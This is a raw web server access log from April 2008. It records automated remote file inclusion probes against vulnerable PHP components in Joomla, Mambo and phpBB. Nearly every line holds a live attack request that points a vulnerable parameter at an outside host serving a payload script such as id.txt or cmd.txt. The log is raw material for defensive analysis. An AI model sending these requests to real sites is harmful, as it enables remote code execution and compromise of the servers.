69.9.129.6 - - [20/Apr/2008:17:54:05 -0600] "GET /logs/error_log.20080406/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.thenationalcouncil.com/webcalendar/tools/di?? HTTP/1.1" 404 278 "-" "libwww-perl/5.805"
69.9.129.6 - - [20/Apr/2008:17:54:05 -0600] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.thenationalcouncil.com/webcalendar/tools/di?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
69.9.129.6 - - [20/Apr/2008:17:54:05 -0600] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.thenationalcouncil.com/webcalendar/tools/di?? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
72.51.46.161 - - [20/Apr/2008:17:54:33 -0600] "GET /logs/error_log.20080330//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 290 "-" "libwww-perl/5.811"
72.51.46.161 - - [20/Apr/2008:17:54:34 -0600] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.811"
72.51.46.161 - - [20/Apr/2008:17:54:34 -0600] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 271 "-" "libwww-perl/5.811"
69.89.31.222 - - [20/Apr/2008:17:55:16 -0600] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.rentacarspain.net//modules/Forums/admin/.muie/spread.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
69.89.31.222 - - [20/Apr/2008:17:55:16 -0600] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.rentacarspain.net//modules/Forums/admin/.muie/spread.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
69.89.31.222 - - [20/Apr/2008:17:55:16 -0600] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.rentacarspain.net//modules/Forums/admin/.muie/test.txt??? HTTP/1.1" 404 266 "-" "Mozilla/3.0 (OS/2; U)"
69.89.31.222 - - [20/Apr/2008:17:55:16 -0600] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.rentacarspain.net//modules/Forums/admin/.muie/test.txt??? HTTP/1.1" 404 271 "-" "Mozilla/3.0 (OS/2; U)"
72.51.46.161 - - [20/Apr/2008:17:55:27 -0600] "GET /logs/error_log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 281 "-" "libwww-perl/5.811"
200.62.142.210 - - [20/Apr/2008:17:55:57 -0600] "GET /logs/error_log.20080330//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 290 "-" "libwww-perl/5.76"
200.62.142.210 - - [20/Apr/2008:17:55:57 -0600] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.76"
200.62.142.210 - - [20/Apr/2008:17:55:58 -0600] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 271 "-" "libwww-perl/5.76"
69.9.129.6 - - [20/Apr/2008:17:56:11 -0600] "GET /logs/access_log/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.thenationalcouncil.com/webcalendar/tools/di?? HTTP/1.1" 404 270 "-" "libwww-perl/5.805"
222.255.3.68 - - [20/Apr/2008:17:56:26 -0600] "GET //?mosConfig_absolute_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 200 698 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
222.255.3.68 - - [20/Apr/2008:17:56:26 -0600] "GET /logs//?mosConfig_absolute_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 200 1740 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
72.51.46.161 - - [20/Apr/2008:17:56:35 -0600] "GET /logs/access_log.20080330//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 291 "-" "libwww-perl/5.811"
66.212.23.249 - - [20/Apr/2008:17:57:29 -0600] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://keirafans.net/img/test.txt? HTTP/1.1" 404 266 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
66.212.23.249 - - [20/Apr/2008:17:57:30 -0600] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://keirafans.net/img/test.txt? HTTP/1.1" 404 271 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
69.89.31.222 - - [20/Apr/2008:17:57:49 -0600] "GET /index.php?page=http://www.rentacarspain.net//modules/Forums/admin/.muie/spread.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
69.89.31.222 - - [20/Apr/2008:17:57:49 -0600] "GET /logs/index.php?page=http://www.rentacarspain.net//modules/Forums/admin/.muie/spread.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
69.89.31.222 - - [20/Apr/2008:17:57:49 -0600] "GET /logs/index.php?page=http://www.rentacarspain.net//modules/Forums/admin/.muie/test.txt??? HTTP/1.1" 404 232 "-" "Mozilla/3.0 (OS/2; U)"
69.89.31.222 - - [20/Apr/2008:17:57:50 -0600] "GET /index.php?page=http://www.rentacarspain.net//modules/Forums/admin/.muie/test.txt??? HTTP/1.1" 404 227 "-" "Mozilla/3.0 (OS/2; U)"
200.62.142.210 - - [20/Apr/2008:17:57:59 -0600] "GET /logs/error_log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 281 "-" "libwww-perl/5.76"
64.62.128.4 - - [20/Apr/2008:17:59:29 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 247 "-" "libwww-perl/5.63"
64.62.128.4 - - [20/Apr/2008:17:59:29 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 242 "-" "libwww-perl/5.63"
200.62.142.210 - - [20/Apr/2008:18:00:39 -0600] "GET /logs/access_log.20080330//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 291 "-" "libwww-perl/5.76"
72.232.247.138 - - [20/Apr/2008:18:00:43 -0600] "GET /logs/error_log.20080330/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kukekaw.fileave.com/id2.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.79"
72.232.247.138 - - [20/Apr/2008:18:00:43 -0600] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kukekaw.fileave.com/id2.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
72.232.247.138 - - [20/Apr/2008:18:00:43 -0600] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kukekaw.fileave.com/id2.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
209.240.231.154 - - [20/Apr/2008:18:01:08 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
209.240.231.154 - - [20/Apr/2008:18:01:08 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
69.89.31.222 - - [20/Apr/2008:18:03:56 -0600] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/spread.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
69.89.31.222 - - [20/Apr/2008:18:03:57 -0600] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/test.txt??? HTTP/1.1" 404 255 "-" "Mozilla/3.0 (OS/2; U)"
69.89.31.222 - - [20/Apr/2008:18:03:57 -0600] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/spread.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
69.89.31.222 - - [20/Apr/2008:18:03:57 -0600] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/test.txt??? HTTP/1.1" 404 260 "-" "Mozilla/3.0 (OS/2; U)"
222.255.3.68 - - [20/Apr/2008:18:04:13 -0600] "GET /logs//?mosConfig_absolute_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 200 1740 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
222.255.3.68 - - [20/Apr/2008:18:04:13 -0600] "GET //?mosConfig_absolute_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 200 698 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
200.62.142.210 - - [20/Apr/2008:18:04:36 -0600] "GET /logs/access_log.20080224/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 280 "-" "libwww-perl/5.76"
200.62.142.210 - - [20/Apr/2008:18:04:37 -0600] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.76"
200.62.142.210 - - [20/Apr/2008:18:04:37 -0600] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.76"
75.126.218.14 - - [20/Apr/2008:18:04:54 -0600] "GET /logs/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.811"
75.126.218.14 - - [20/Apr/2008:18:04:54 -0600] "GET /Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.811"
209.240.231.154 - - [20/Apr/2008:18:06:59 -0600] "GET /logs/access_log//phpsecurityadmin/include/logout.php?PSA_PATH=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
209.240.231.154 - - [20/Apr/2008:18:06:59 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
209.240.231.154 - - [20/Apr/2008:18:06:59 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
209.240.231.154 - - [20/Apr/2008:18:07:16 -0600] "GET /logs/error_log//phpsecurityadmin/include/logout.php?PSA_PATH=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
72.232.247.138 - - [20/Apr/2008:18:07:34 -0600] "GET /logs/access_log//skin/zero_vote/ask_password.php?dir=http://kukekaw.fileave.com/id2.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
72.232.247.138 - - [20/Apr/2008:18:07:34 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://kukekaw.fileave.com/id2.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
72.232.247.138 - - [20/Apr/2008:18:07:34 -0600] "GET /logs//skin/zero_vote/ask_password.php?dir=http://kukekaw.fileave.com/id2.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
203.22.204.188 - - [20/Apr/2008:18:08:06 -0600] "GET /logs/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.808"
203.22.204.188 - - [20/Apr/2008:18:08:07 -0600] "GET /Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.808"
66.193.60.15 - - [20/Apr/2008:18:08:56 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://odyrt.net/info/templates/cmd.txt? HTTP/1.1" 404 238 "-" "libwww-perl/5.803"
220.80.107.90 - - [20/Apr/2008:18:10:12 -0600] "GET /logs/error_log//phpsecurityadmin/include/logout.php?PSA_PATH=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
220.80.107.90 - - [20/Apr/2008:18:10:13 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
220.80.107.90 - - [20/Apr/2008:18:10:13 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
72.232.247.138 - - [20/Apr/2008:18:10:22 -0600] "GET /logs/error_log.20080330/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kukekaw.fileave.com/id2.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.79"
72.232.247.138 - - [20/Apr/2008:18:10:23 -0600] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kukekaw.fileave.com/id2.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
72.232.247.138 - - [20/Apr/2008:18:10:23 -0600] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kukekaw.fileave.com/id2.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
213.215.228.18 - - [20/Apr/2008:18:10:25 -0600] "GET /logs/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
213.215.228.18 - - [20/Apr/2008:18:10:25 -0600] "GET /Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
204.15.10.228 - - [20/Apr/2008:18:11:25 -0600] "GET /logs/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.810"
204.15.10.228 - - [20/Apr/2008:18:11:25 -0600] "GET /Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.810"
220.80.107.90 - - [20/Apr/2008:18:12:38 -0600] "GET /logs/access_log//phpsecurityadmin/include/logout.php?PSA_PATH=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
69.58.0.71 - - [20/Apr/2008:18:13:56 -0600] "GET /logs/index.php?pagina=http://www.troop66nm.org/image/response1?? HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
69.58.0.71 - - [20/Apr/2008:18:13:56 -0600] "GET /index.php?pagina=http://www.troop66nm.org/image/response1?? HTTP/1.1" 404 227 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
83.149.160.250 - - [20/Apr/2008:18:16:39 -0600] "GET /logs/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.803"
83.149.160.250 - - [20/Apr/2008:18:16:40 -0600] "GET /Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
74.55.6.34 - - [20/Apr/2008:18:16:43 -0600] "GET /logs/error_log.20080330//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=U'R%20AttackeR?? HTTP/1.1" 404 290 "-" "libwww-perl/5.810"
74.55.6.34 - - [20/Apr/2008:18:16:43 -0600] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=U'R%20AttackeR?? HTTP/1.1" 404 266 "-" "libwww-perl/5.810"
74.55.6.34 - - [20/Apr/2008:18:16:43 -0600] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=U'R%20AttackeR?? HTTP/1.1" 404 271 "-" "libwww-perl/5.810"
74.55.6.34 - - [20/Apr/2008:18:17:30 -0600] "GET /logs/error_log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=U'R%20AttackeR?? HTTP/1.1" 404 281 "-" "libwww-perl/5.810"
77.74.195.98 - - [20/Apr/2008:18:18:03 -0600] "GET /logs/access_log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.geocities.com/kumpulan_surat_sephani/jabodetabek.txt?? HTTP/1.1" 404 288 "-" "libwww-perl/5.810"
77.74.195.98 - - [20/Apr/2008:18:18:03 -0600] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.geocities.com/kumpulan_surat_sephani/jabodetabek.txt?? HTTP/1.1" 404 272 "-" "libwww-perl/5.810"
77.74.195.98 - - [20/Apr/2008:18:18:04 -0600] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.geocities.com/kumpulan_surat_sephani/jabodetabek.txt?? HTTP/1.1" 404 277 "-" "libwww-perl/5.810"
77.74.195.98 - - [20/Apr/2008:18:18:07 -0600] "GET /logs/error_log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.geocities.com/kumpulan_surat_sephani/jabodetabek.txt?? HTTP/1.1" 404 287 "-" "libwww-perl/5.810"
77.74.195.98 - - [20/Apr/2008:18:18:13 -0600] "GET /logs/access_log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.geocities.com/kumpulan_surat_sephani/jabodetabek.txt?? HTTP/1.1" 404 288 "-" "libwww-perl/5.810"
77.74.195.98 - - [20/Apr/2008:18:18:13 -0600] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.geocities.com/kumpulan_surat_sephani/jabodetabek.txt?? HTTP/1.1" 404 272 "-" "libwww-perl/5.810"
77.74.195.98 - - [20/Apr/2008:18:18:13 -0600] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.geocities.com/kumpulan_surat_sephani/jabodetabek.txt?? HTTP/1.1" 404 277 "-" "libwww-perl/5.810"
77.74.195.98 - - [20/Apr/2008:18:18:17 -0600] "GET /logs/error_log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.geocities.com/kumpulan_surat_sephani/jabodetabek.txt?? HTTP/1.1" 404 287 "-" "libwww-perl/5.810"
72.232.247.138 - - [20/Apr/2008:18:18:29 -0600] "GET /logs/error_log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kukekaw.fileave.com/id2.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
72.232.247.138 - - [20/Apr/2008:18:18:32 -0600] "GET /logs/error_log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kukekaw.fileave.com/id2.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
74.55.6.34 - - [20/Apr/2008:18:18:35 -0600] "GET /logs/access_log.20080330//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=U'R%20AttackeR?? HTTP/1.1" 404 291 "-" "libwww-perl/5.810"
69.9.129.6 - - [20/Apr/2008:18:18:39 -0600] "GET /logs/access_log.20080330/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.thenationalcouncil.com/webcalendar/tools/di?? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
69.9.129.6 - - [20/Apr/2008:18:18:39 -0600] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.thenationalcouncil.com/webcalendar/tools/di?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
69.9.129.6 - - [20/Apr/2008:18:18:39 -0600] "GET /logs/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.thenationalcouncil.com/webcalendar/tools/di?? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
69.9.129.6 - - [20/Apr/2008:18:19:41 -0600] "GET /logs/access_log/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.thenationalcouncil.com/webcalendar/tools/di?? HTTP/1.1" 404 264 "-" "libwww-perl/5.805"
74.6.11.251 - - [20/Apr/2008:18:21:03 -0600] "GET /robots.txt HTTP/1.0" 404 204 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.216.89 - - [20/Apr/2008:18:21:05 -0600] "GET /logs/access_log HTTP/1.0" 200 20225 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.232.247.138 - - [20/Apr/2008:18:23:53 -0600] "GET /logs/error_log.20080330/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kukekaw.fileave.com/id2.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.79"
72.232.247.138 - - [20/Apr/2008:18:23:53 -0600] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kukekaw.fileave.com/id2.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
72.232.247.138 - - [20/Apr/2008:18:23:53 -0600] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kukekaw.fileave.com/id2.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
200.230.71.1 - - [20/Apr/2008:18:27:14 -0600] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
200.230.71.1 - - [20/Apr/2008:18:27:14 -0600] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
200.230.71.1 - - [20/Apr/2008:18:27:14 -0600] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
200.230.71.1 - - [20/Apr/2008:18:27:15 -0600] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
64.119.182.47 - - [20/Apr/2008:18:27:45 -0600] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.imageforum.ru//language/lang_english/languages/test.txt??? HTTP/1.1" 404 269 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
64.119.182.47 - - [20/Apr/2008:18:27:45 -0600] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.imageforum.ru//language/lang_english/languages/test.txt??? HTTP/1.1" 404 274 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
64.26.63.23 - - [20/Apr/2008:18:30:37 -0600] "GET /logs/errors.php/errors.php?error=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
64.26.63.23 - - [20/Apr/2008:18:30:37 -0600] "GET /errors.php/errors.php?error=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
72.232.247.138 - - [20/Apr/2008:18:31:16 -0600] "GET /logs/error_log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kukekaw.fileave.com/id2.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
204.15.120.73 - - [20/Apr/2008:18:32:26 -0600] "GET /logs/access_log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://geocities.com/kumpulan_surat_sephani/jabodetabek.txt????? HTTP/1.1" 404 288 "-" "libwww-perl/5.79"
204.15.120.73 - - [20/Apr/2008:18:32:26 -0600] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://geocities.com/kumpulan_surat_sephani/jabodetabek.txt????? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
204.15.120.73 - - [20/Apr/2008:18:32:27 -0600] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://geocities.com/kumpulan_surat_sephani/jabodetabek.txt????? HTTP/1.1" 404 277 "-" "libwww-perl/5.79"
204.15.120.73 - - [20/Apr/2008:18:32:44 -0600] "GET /logs/error_log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://geocities.com/kumpulan_surat_sephani/jabodetabek.txt????? HTTP/1.1" 404 287 "-" "libwww-perl/5.79"
209.200.245.189 - - [20/Apr/2008:18:42:11 -0600] "GET /senetman/html/index.php?page=http://www.math-center.gr/components/com_facileforms/.log/rox.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
209.200.245.189 - - [20/Apr/2008:18:42:11 -0600] "GET /logs/senetman/html/index.php?page=http://www.math-center.gr/components/com_facileforms/.log/rox.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
64.22.89.194 - - [20/Apr/2008:18:42:18 -0600] "GET /logs/error_log.20080330//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
64.22.89.194 - - [20/Apr/2008:18:42:19 -0600] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 272 "-" "libwww-perl/5.808"
64.22.89.194 - - [20/Apr/2008:18:42:19 -0600] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.808"
74.53.197.2 - - [20/Apr/2008:18:42:44 -0600] "GET /logs/error_log.20080330//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
